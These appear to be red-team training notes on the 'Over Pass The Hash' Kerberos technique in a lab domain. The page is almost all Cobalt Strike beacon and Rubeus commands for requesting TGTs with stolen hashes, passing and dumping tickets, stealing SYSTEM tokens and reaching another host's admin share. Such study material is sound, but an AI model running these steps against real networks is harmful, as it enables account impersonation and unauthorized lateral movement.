Over Pass The Hash

Rubeus allows us to perform opth without needing elevated privileges. The process to follow is:

  • Request a TGT for the user we want to impersonate.

  • Create a sacrificial logon session.

  • Pass the TGT into that logon session.

  • Access the target resource.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /rc4:4ffd3eabdce2e158d923ddec72de979e /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec1 /nowrap /opsec

beacon> make_token DEV\jking DummyPass
beacon> run klist

PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
beacon> ls \\srv-2\c$

beacon> rev2self

Automate with elevated privileges.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec1 /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe

beacon> steal_token 3044
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> ls \\srv-2\c$

Dump Tickets (Alternative Way)

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe dump /service:krbtgt /luid:0x462eb /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]

beacon> steal_token 4872
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> ls \\srv-2\c$
PreviousPass The HashNextInternal Password Spraying

Last updated